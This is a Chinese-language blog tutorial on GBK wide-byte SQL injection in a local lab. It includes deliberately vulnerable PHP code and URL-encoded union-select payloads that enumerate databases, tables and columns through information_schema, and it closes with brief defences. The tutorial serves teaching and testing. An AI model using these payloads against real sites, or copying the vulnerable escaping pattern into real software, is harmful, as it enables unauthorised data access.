sql注入之宽字节注入

宽字节注入是因为数据库使用了GBK编码,不过现在大都使用unicode国际编码,大多数网站都使用了utf-8的编码

不过既然是sql注入的一部分,也搭建环境  做做实验

实验环境:

wamp集成包

实验说明:

创建使用GBK编码的数据库

实验步骤:

使用phpmyadmin进行创建数据库的时候,如果不去选择编码格式,默认会使用latin1_swedish_ci 格式

查了一下 ,和GBK类似,那就这个吧。。。

使用默认编码,创建数据库后继续创建表格

latin1_swedish_ci

这里需要注意的是,使用latin1_swedish_ci 格式进行创建表,插入数据时

当插入汉字的时候,提示编码问题

难怪现在的大多网站都使用utf-8编码

sql注入之宽字节注入_第1张图片
格式问题

修改字段的编码格式   可插入汉字

继续编写php漏洞代码

header("Content-type:text/html;charset=utf-8");

$id=@$_GET['id'];

if(isset($id)&&!empty($id)){

$id = addslashes($_GET['id']);//进行转义

$conn=mysql_connect('localhost','root','')  or  die  ("false");

mysql_select_db("tests",$conn);

mysql_query("set names 'gbk' ",$conn);//指明数据库gbk处理,不安全的编码格式

$sql = "select * from test where id='".$id."'";

$result = mysql_query($sql, $conn);

while ($row=@mysql_fetch_array($result)){

echo "用户名:".$row['name']."


";

//echo "密码:".$row['password']."";

}

mysql_close($conn);

print_r('执行SQL语句:'.$sql);

}else{

echo  "id  错误";

}

?>

进行访问   注入   测试

sql注入之宽字节注入_第2张图片
addslashes的转义

发现已经被转义了,使用%df  ' 进行注入

sql注入之宽字节注入_第3张图片

继续注入   %df%27 union select  1,2,3   #

注意URL编码问题

sql注入之宽字节注入_第4张图片
注入成功

以下为URL编码:

%27---------单引号

%20----------空格

%23-----------#号

%5c------------/反斜杠

为什么可以注入成功?

修改一下   header  改为gbk

header("Content-type:text/html;charset=gbk");

再次查看

sql注入之宽字节注入_第5张图片
反斜杠神奇消失

为什么反斜杠变成  運  这个玩意啦?

id=1'---------->id=1\'--------->id=1%5c%27

id=1%df'---------id=1%df%5c%27---------->id=1%DF5C%27-------->id=1運'

其实就是利用gbk是多字节的编码,两个字节代表一个汉字

%df    %5c   组合出了一个  運 字

因此  可以注入

sql注入之宽字节注入_第6张图片
success

扩展:

爆出所有的数据库名

payload:

id=%df%27%20union%20select%201,schema_name,3%20from%20information_schema.schemata%20limit%206,5%20%23

sql注入之宽字节注入_第7张图片
数据库名

爆出数据库中的数据表

payload:

id=%df%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=0x64767761%20limit%200,61%20%23

dvwa的十六进制编码为0x64767761

sql注入之宽字节注入_第8张图片
所有数据表

爆出指定数据库的字段

payload:

id=%df%27%20union%20select%201,column_name,3%20from%20information_schema.columns%20where%20table_schema=0x64767761%20and%20table_name=0x61646D696E%20limit%200,61%20%23

爆出字段

注意使用十六进制

table_schema=0x64767761(dvwa)  and  table_name=0x61646D696E(admin)

根据以上信息,可进行mysql的跨库查询,查询任意数据库的任意信息

sql注入之宽字节注入_第9张图片
可查询信息

防御:

1.使用mysql_set_charset(utf8)指定字符集

2. 使用mysql_real_escape_string进行转义

你可能感兴趣的:(sql注入之宽字节注入)